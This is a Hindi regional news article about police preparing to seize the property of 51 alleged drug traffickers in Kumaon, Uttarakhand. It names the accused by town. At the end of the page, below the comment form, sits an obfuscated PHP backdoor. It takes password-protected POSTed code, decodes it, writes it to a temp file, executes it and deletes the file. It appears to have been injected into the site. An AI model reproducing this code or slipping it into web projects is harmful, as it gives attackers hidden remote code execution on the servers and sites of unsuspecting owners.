Haldwani: नशा तस्करी से जुड़े 51 अपराधियों की संपत्ति जब्त करने की तैयारी, नैनीताल में सबसे अधिक अपराधी

Uttarakhand Press 26 September 2023: हल्द्वानी। तराई से पहाड़ तक नशा तस्करी से जुड़े 51 अपराधी पुलिस की राडार पर हैं। पुलिस ने अवैध रूप से अर्जित की गई संपत्ति को चिन्हित कर लिया है। जिसे जब्त करने के लिए फाइल संस्तुति के लिए डीएम कार्यालय भेज दी है। सबसे अधिक 25 अपराधी नैनीताल व 13 उधम सिंह नगर तथा 13 अपराधी चंपावत, अल्मोड़ा और बागेश्वर जिले के हैं।

सरकार कुमाऊं को वर्ष 2025 तक नशा मुक्त करना चाहती है। पुलिस भी इसी मिशन के साथ आगे बढ़ रही है। बरेली से पहुंच रही स्मैक तस्करों पर कुछ हद तक अंकुश लगा है तो वहीं पहाड़ से मैदान में आने वाली चरस की खपत कम हुई है। तीन दिन पहले नैनीताल पुलिस ने स्मैक तस्करी के खिलाफ बड़ी कार्रवाई कर बरेली उत्तरप्रदेश के एक कांस्टेबल व दो बीडीएस-एमसीए के छात्र को गिरफ्तार किया। इनसे एक किलो स्मैक पकड़ी गई थी। दूसरे दिन एक किलो चरस और तीसरे दिन नशीले इंजेक्शन की खेप पकड़ी।

इसी तरह उधम सिंह नगर पुलिस ने भी एक किलो स्मैक के साथ आरोपितों को गिरफ्तार किया था और अन्य जिलो में भी कार्रवाई चल रही है। पूर्व आइजी डॉ. नीलेश आनंद भरणे ने नशा तस्करी से जुड़े 51 अपराधियों की कुंडली तैयार कर संपत्ति की जांच कराई। जिसे जब्त करने के लिए डीएम को भेज दिया था। पुलिस सूत्रों के अनुसार डीएम स्तर पर जांच चल रही है। उनका आदेश मिलते ही संपत्ति को जब्त करने की कार्रवाई की जाएगी।

इन अपराधियों की संपत्ति होगी जब्त:
रामनगर- वसीम खान, विष्णु अग्रवाल, राहुल टम्टा, आरिफ, जगत सिंह चौधरी, गणेश अधिकारी, दलबीर, राजबीर सिंह, शानू खान, आशू खान, घनानंद, शंकर सिंह, शैलेंद्र शर्मा, जयप्रकाश, हरदेव सिंह व प्रदीप कुमार।

बनभूलपुरा- रंजना सोनकर अजय यादव व लाखन सोनकर।

हल्द्वानी- अरविंद कुमार तोमर, अरुण चौधरी व विनोद कुमार।

लालकुआं- शादिक व दिलशाद।

गदरपुर- अशफाक, दिलशाद, शाहबाज।

काशीपुर- हरजीत, प्रभजीत, गुरजीत।

पुलभट्टा- शकील अहमद, सोएब, आकाशदीप, गुरदीप, देवेंद्र, मनोज, सरवर, आरिफ।

बनबसा-दीपक कुमार, अमन कुरैशी।

पिथौरागढ़- जगदीश, भुवन, प्रकाश, धर्मेश।

अल्मोड़ा, भतरौजखान- महमूद, पवन कश्यप, तरसी सिंह, जीवन आर्या, शाहनवाज अहमद, नसीर अहमद।

65 अपराधियों पर गैंगस्टर:
जनवरी से अब तक पुलिस ने कुमाऊं के 65 अपराधियों पर गैंगस्टर एक्ट लगाया है। इस क्रम में नैनीताल जिले के छह मामलों में 24 पर गैंगस्टर व उधम सिंह नगर में दर्ज पांच मामलों में 23 पर गैंगस्टर लगा। इसी तरह पिथौरागढ़ के एक मामले में 10, अल्मोड़ा व चंपावत में एक-एक मामलों में दो अपराधियों पर गैंगस्टर लगा है।

Read Previous

Uttarakhand: घर से उठा ले गया जावेद फिर भाई की दुकान में नाबालिग से किया दुष्कर्म, अश्लील वीडियो बनाकर दी धमकी

Read Next

नोएडा: इंजीनियर पति और तलाकशुदा पत्नी ने जहरीला पदार्थ खाकर की आत्महत्या, सुसाइड नोट में किया इन बातों का जिक्र

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}